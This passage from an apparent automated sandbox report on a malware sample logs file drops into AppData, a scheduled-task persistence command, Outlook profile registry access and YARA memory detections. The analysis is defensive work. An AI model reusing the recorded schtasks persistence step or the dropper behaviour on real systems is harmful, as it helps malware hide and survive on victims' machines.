              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: YvVDV4cbjy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: YvVDV4cbjy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_013C5E00 push eax; iretd 0_2_013C5E09
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_00D95E00 push eax; iretd 10_2_00D95E09
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F995E5 push eax; retf 10_2_06F995E6
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F992BD push ebx; retf 10_2_06F992C5
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AD4
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AFC
              Source: YvVDV4cbjy.exeStatic PE information: section name: .text entropy: 7.7039906967982645
              Source: HxQXdrrQ.exe.0.drStatic PE information: section name: .text entropy: 7.7039906967982645
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
